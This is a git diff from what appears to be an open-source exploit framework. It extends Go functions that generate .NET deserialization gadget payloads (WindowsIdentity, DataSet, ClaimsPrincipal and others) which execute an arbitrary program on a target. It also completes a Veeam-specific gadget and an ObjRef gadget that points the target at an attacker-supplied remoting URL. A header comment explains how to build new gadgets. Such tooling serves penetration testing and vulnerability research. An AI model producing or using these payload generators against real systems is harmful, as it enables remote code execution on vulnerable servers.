Merge branch 'vulncheck-oss:main' into main

Author: jesusprubio

dotnet/data/ReturnMessage.xml

@@ -0,0 +1,40 @@
+<SOAP-ENV:Fault id="xref-1">
+    <faultcode id="xref-2">SOAP-ENV:Server</faultcode>
+    <faultstring id="xref-3"> **** System.Exception - Exception of type &#39;System.Exception&#39; was thrown.</faultstring>
+    <detail xsi:type="x1:ServerFault" xmlns:x1="http://schemas.microsoft.com/clr/ns/System.Runtime.Serialization.Formatters">
+        <exceptionType xsi:null="1"/>
+        <message xsi:null="1"/>
+        <stackTrace xsi:null="1"/>
+        <exception href="#xref-4"/>
+    </detail>
+</SOAP-ENV:Fault>
+<x2:Exception id="xref-4" xmlns:x2="http://schemas.microsoft.com/clr/ns/System">
+    <ClassName id="xref-5">System.Exception</ClassName>
+    <Message xsi:null="1"/>
+    <Data href="#xref-6"/>
+    <InnerException xsi:null="1"/>
+    <HelpURL xsi:null="1"/>
+    <StackTraceString xsi:null="1"/>
+    <RemoteStackTraceString xsi:null="1"/>
+    <RemoteStackIndex>0</RemoteStackIndex>
+    <ExceptionMethod xsi:null="1"/>
+    <HResult>-2146233088</HResult>
+    <Source xsi:null="1"/>
+    <WatsonBuckets xsi:null="1"/>
+</x2:Exception>
+<x3:ListDictionaryInternal id="xref-6" xmlns:x3="http://schemas.microsoft.com/clr/ns/System.Collections">
+    <head href="#xref-7"/>
+    <version>1</version>
+    <count>1</count>
+</x3:ListDictionaryInternal>
+<x3:ListDictionaryInternal_x002B_DictionaryNode id="xref-7" xmlns:x3="http://schemas.microsoft.com/clr/ns/System.Collections">
+    <key id="xref-9" xsi:type="SOAP-ENC:string">x</key>
+    <value />
+    <next xsi:null="1"/>
+</x3:ListDictionaryInternal_x002B_DictionaryNode>
+<x2:Version id="xref-11" xmlns:x2="http://schemas.microsoft.com/clr/ns/System">
+    <_Major>2</_Major>
+    <_Minor>0</_Minor>
+    <_Build>-1</_Build>
+    <_Revision>-1</_Revision>
+</x2:Version>

dotnet/dotnetgadget.go

@@ -1,3 +1,34 @@
+/*
+This file contains all of the gadget creation functions for use in exploits. Calling one should be as simple as:
+payload, ok := CreateWindowsIdentity("cmd", "/c calc", dotnet.BinaryFormatter)
+if !ok{ return "", false }
+
+The exceptions are the CreateObjectRef and CreateVeeamCryptoKeyInfo as those take (url string, formatter string) instead.
+
+Any of the Create gadget funcs can be called with "" as their formatter which will return just the binary stream of the object, which is the same as binaryformatter.
+
+Information for new gadget development:
+
+These objects are basically just a series of 'records' that ultimately define a class and it's members.
+
+The general format is something like
+
+	serializationHeaderRecord
+	+ binLibString
+	CLASSWITHMEMBERSANDTYPES(ClassObjectID INT32 (usually incremented from 1) + ClassName + MemberCount, MemberNames + AdditionalInfo + []byte{member0Type, member1Type, memberNType, ...} + Library ID INT32 + Array of Membervalues) +
+	string(byte(RecordTypeEnumMap["MessageEnd"])) (just a 0xb)
+
+Sometimes this format gets a bit more complicated because the member values array will contain CLASSWITHMEMBERSANDTYPES records as array items so it's a nested class.
+Also where ArraySingleStringRecord and ArraySinglePrimitiveRecord are concerned, these get referenced in member values and then are appended after the class record like so:
+
+	payload := serializationHeaderRecordString +
+		binaryLibraryRecordString +
+		classWithMembersAndTypesString +
+		arraySingleStringRecordString +
+		string(byte(RecordTypeEnumMap["MessageEnd"]))
+
+There should be enough information in the existing gadgets to infer from in order to make new gadgets.
+*/
 package dotnet
 
 import (
@@ -117,7 +148,12 @@ func CreateTextFormattingRunProperties(program string, args string, formatter st
 	case BinaryFormatter:
 		return payload, true
 	case SOAPFormatter:
-		return FormatSOAP([]Record{classWithMembersAndTypes})
+		xmlData, _, ok := FormatSOAP([]Record{classWithMembersAndTypes})
+		if !ok {
+			return "", false
+		}
+
+		return xmlData, true
 	default:
 		output.PrintfFrameworkError("Invalid formatter specified for this gadget type. Requested: %s, supported: 'LOSFormatter', 'BinaryFormatter', 'SOAPFormatter'", formatter)
 
@@ -155,6 +191,7 @@ func CreateDataSet(program string, args string, formatter string) (string, bool)
 		"DataSet.Tables.Count",
 		"DataSet.Tables_0",
 	}
+
 	memberTypes := []string{
 		"Class",
 		"String",
@@ -244,8 +281,17 @@ func CreateDataSet(program string, args string, formatter string) (string, bool)
 		return FormatLOS(payload), true
 	case BinaryFormatter:
 		return payload, true
+	case SOAPFormatterWithExceptions:
+		return FormatSOAPWithExceptions([]Record{classWithMembersAndTypes, arraySinglePrimitiveRecord})
+	case SOAPFormatter:
+		xmlData, _, ok := FormatSOAP([]Record{classWithMembersAndTypes, arraySinglePrimitiveRecord})
+		if !ok {
+			return "", false
+		}
+
+		return xmlData, true
 	default:
-		output.PrintfFrameworkError("Invalid formatter specified for this gadget type. Requested: %s, supported: 'LOSFormatter', 'BinaryFormatter'", formatter)
+		output.PrintfFrameworkError("Invalid formatter specified for this gadget type. Requested: %s, supported: 'LOSFormatter', 'BinaryFormatter', 'SOAPFormatter', 'SOAPFormatterWithExceptions'", formatter)
 
 		return "", false
 	}
@@ -265,6 +311,7 @@ func CreateObjectDataProvider(program string, args string, formatter string) (st
 		},
 	}
 
+	// validating the output as JSON
 	jsonData, err := json.Marshal(gadget)
 	if err != nil {
 		output.PrintfFrameworkError("Error serializing to JSON: %v", err)
@@ -274,7 +321,7 @@ func CreateObjectDataProvider(program string, args string, formatter string) (st
 	payload := string(jsonData)
 
 	switch formatter {
-	case "JSONFormatter": // This is basically the same as binaryformatter, just returns a string
+	case "JSONFormatter":
 		return payload, true
 	case "":
 		return payload, true
@@ -601,7 +648,12 @@ func CreateWindowsIdentity(program string, args string, formatter string) (strin
 	case "":
 		return payload, true
 	case SOAPFormatter:
-		return FormatSOAP([]Record{systemClassWithMembersAndTypesRecord})
+		xmlData, _, ok := FormatSOAP([]Record{systemClassWithMembersAndTypesRecord})
+		if !ok {
+			return "", false
+		}
+
+		return xmlData, true
 	default:
 		output.PrintfFrameworkError("Invalid formatter specified for this gadget type. Requested: %s, supported: 'LOSFormatter', 'BinaryFormatter', 'SOAPFormatter'", formatter)
 
@@ -660,7 +712,12 @@ func CreateClaimsPrincipal(program string, args string, formatter string) (strin
 	case "":
 		return payload, true
 	case SOAPFormatter:
-		return FormatSOAP([]Record{systemClassWithMembersAndTypesRecord})
+		xmlData, _, ok := FormatSOAP([]Record{systemClassWithMembersAndTypesRecord})
+		if !ok {
+			return "", false
+		}
+
+		return xmlData, true
 	default:
 		output.PrintfFrameworkError("Invalid formatter specified for this gadget type. Requested: %s, supported: 'LOSFormatter', 'BinaryFormatter', 'SOAPFormatter'", formatter)
 
@@ -813,15 +870,14 @@ func CreateDataSetTypeSpoof(program string, args string, formatter string) (stri
 	}
 }
 
-//nolint:revive
-func CreateVeeamCryptoKeyInfo(formatter string) (string, bool) {
-	innerObjRef := "TODOPLACEHOLDER"
-	if innerObjRef == "TODOPLACEHOLDER" {
-		// needs CreateObjectRef gadget to be made
-		output.PrintFrameworkError("Not yet implemented, needs CreateObjectRef")
-
+func CreateVeeamCryptoKeyInfo(url string, formatter string) (string, bool) {
+	innerObjRef, ok := CreateObjectRef(url, "")
+	if !ok {
 		return "", false
 	}
+	b64String := make([]byte, base64.StdEncoding.EncodedLen(len(innerObjRef)))
+	base64.StdEncoding.Encode(b64String, []byte(innerObjRef))
+	innerObjRefB64 := string(b64String)
 
 	memberTypes := []string{"SystemClass", "Object", "Primitive", "String", "String", "Primitive", "Primitive", "Primitive", "StringArray"}
 
@@ -869,9 +925,9 @@ func CreateVeeamCryptoKeyInfo(formatter string) (string, bool) {
 	innerAdditionalInfo = append(innerAdditionalInfo, PrimitiveTypeEnum["Byte"])
 	innerAdditionalInfo = append(innerAdditionalInfo, PrimitiveTypeEnum["Byte"])
 
-	innerMemberValues = append(innerMemberValues, PrimitiveInt32(-1356456226)) // MAKE SURE THIS PRODUCES THE SAME BYTES de 1e 26 af INT32
-	innerMemberValues = append(innerMemberValues, PrimitiveInt16(-16401))      // MAKE SURE THIS PRODUCES THE SAME BYTES ef bf INT16
-	innerMemberValues = append(innerMemberValues, PrimitiveInt16(20306))       // MAKE SURE THIS PRODUCES THE SAME BYTES 52 4f // WRONG INT16
+	innerMemberValues = append(innerMemberValues, PrimitiveInt32(-1356456226))
+	innerMemberValues = append(innerMemberValues, PrimitiveInt16(-16401))
+	innerMemberValues = append(innerMemberValues, PrimitiveInt16(20306))
 	// 97 0f 7f fe 1c 1c 79 27
 	innerMemberValues = append(innerMemberValues, PrimitiveByte(0x97))
 	innerMemberValues = append(innerMemberValues, PrimitiveByte(0x0f))
@@ -898,17 +954,6 @@ func CreateVeeamCryptoKeyInfo(formatter string) (string, bool) {
 		MemberTypeInfo: innerMemberTypeInfo,
 	}
 
-	//ClassInfo: ClassInfo{
-	//ObjectID:    -3,
-	//Name:        "System.Data.SerializationFormat",
-	//MemberNames: []string{"value__"},
-	// },
-	//MemberTypeInfo: innerMemberTypeInfo,
-	//LibraryID:      libraryID,
-	//MemberValues:   innerMemberValues,
-	//BinaryLibrary:  binaryLibrary,
-	////
-
 	var memberValues []interface{}
 	memberValues = append(memberValues, innerSystemClassWithMembersAndTypes) // ID GUID
 	memberValues = append(memberValues, ObjectNullRecord{})                  // KeySetID null
@@ -923,7 +968,7 @@ func CreateVeeamCryptoKeyInfo(formatter string) (string, bool) {
 	memberValues = append(memberValues, MemberReferenceRecord{IDRef: 6})    // CryptoAlg int 1
 
 	var arrayMembers []interface{}
-	// arrayMembers = append(arrayMembers, BinaryObjectRecord{ObjectID: 7, Value: innerObjRef}) // UNCOMMENT when innerObjRef is complete
+	arrayMembers = append(arrayMembers, BinaryObjectRecord{ObjectID: 7, Value: innerObjRefB64})
 	arraySingleStringRecord := ArraySingleStringRecord{
 		ArrayInfo: ArrayInfo{
 			ObjectID:    6,
@@ -964,5 +1009,97 @@ func CreateVeeamCryptoKeyInfo(formatter string) (string, bool) {
 		arraySingleStringRecordString +
 		string(byte(RecordTypeEnumMap["MessageEnd"]))
 
-	return payload, true
+	switch formatter {
+	case BinaryFormatter:
+		return payload, true
+	case "":
+		return payload, true
+	default:
+		output.PrintfFrameworkError("Invalid formatter specified for this gadget type. Requested: %s, supported: 'BinaryFormatter'", formatter)
+
+		return "", false
+	}
+}
+
+func CreateObjectRef(url string, formatter string) (string, bool) {
+	secondClassName := "System.Runtime.Remoting.ObjRef"
+	firstClassName := "System.Exception"
+
+	secondMemberNames := []string{"url"}
+	firstMemberNames := []string{"ClassName"}
+
+	secondMemberTypes := []string{"String"}
+	firstMemberTypes := []string{"SystemClass"}
+
+	var secondMemberValues []interface{}
+	secondMemberValues = append(secondMemberValues, BinaryObjectRecord{ObjectID: 3, Value: url})
+
+	var firstMemberValues []interface{}
+	firstMemberValues = append(firstMemberValues, MemberReferenceRecord{IDRef: 2})
+
+	var firstAdditionalInfo []interface{}
+	firstAdditionalInfo = append(firstAdditionalInfo, "System.Runtime.Remoting.ObjRef")
+
+	firstClassInfo := ClassInfo{
+		ObjectID:    1,
+		Name:        firstClassName,
+		MemberCount: len(firstMemberNames),
+		MemberNames: firstMemberNames,
+	}
+
+	secondClassInfo := ClassInfo{
+		ObjectID:    2,
+		Name:        secondClassName,
+		MemberCount: len(secondMemberNames),
+		MemberNames: secondMemberNames,
+	}
+
+	secondMemberTypeInfo, ok := getMemberTypeInfo(secondMemberTypes, secondMemberNames, nil)
+	if !ok {
+		return "", false
+	}
+
+	firstMemberTypeInfo, ok := getMemberTypeInfo(firstMemberTypes, firstMemberNames, firstAdditionalInfo)
+	if !ok {
+		return "", false
+	}
+
+	firstSystemClassWithMembersAndTypesRecord := SystemClassWithMembersAndTypesRecord{
+		ClassInfo:      firstClassInfo,
+		MemberValues:   firstMemberValues,
+		MemberTypeInfo: firstMemberTypeInfo,
+	}
+
+	secondSystemClassWithMembersAndTypesRecord := SystemClassWithMembersAndTypesRecord{
+		ClassInfo:      secondClassInfo,
+		MemberValues:   secondMemberValues,
+		MemberTypeInfo: secondMemberTypeInfo,
+	}
+
+	// finalize
+	serializationHeaderRecord := SerializationHeaderRecord{RootID: 1, HeaderID: -1}
+	serializationHeaderRecordString, _ := serializationHeaderRecord.ToRecordBin()
+	firstSystemClassWithMembersAndTypesString, ok := firstSystemClassWithMembersAndTypesRecord.ToRecordBin()
+	if !ok {
+		return "", false
+	}
+	secondSystemClassWithMembersAndTypesString, ok := secondSystemClassWithMembersAndTypesRecord.ToRecordBin()
+	if !ok {
+		return "", false
+	}
+	payload := serializationHeaderRecordString +
+		firstSystemClassWithMembersAndTypesString +
+		secondSystemClassWithMembersAndTypesString +
+		string(byte(RecordTypeEnumMap["MessageEnd"]))
+
+	switch formatter {
+	case BinaryFormatter:
+		return payload, true
+	case "":
+		return payload, true
+	default:
+		output.PrintfFrameworkError("Invalid formatter specified for this gadget type. Requested: %s, supported: 'BinaryFormatter'", formatter)
+
+		return "", false
+	}
 }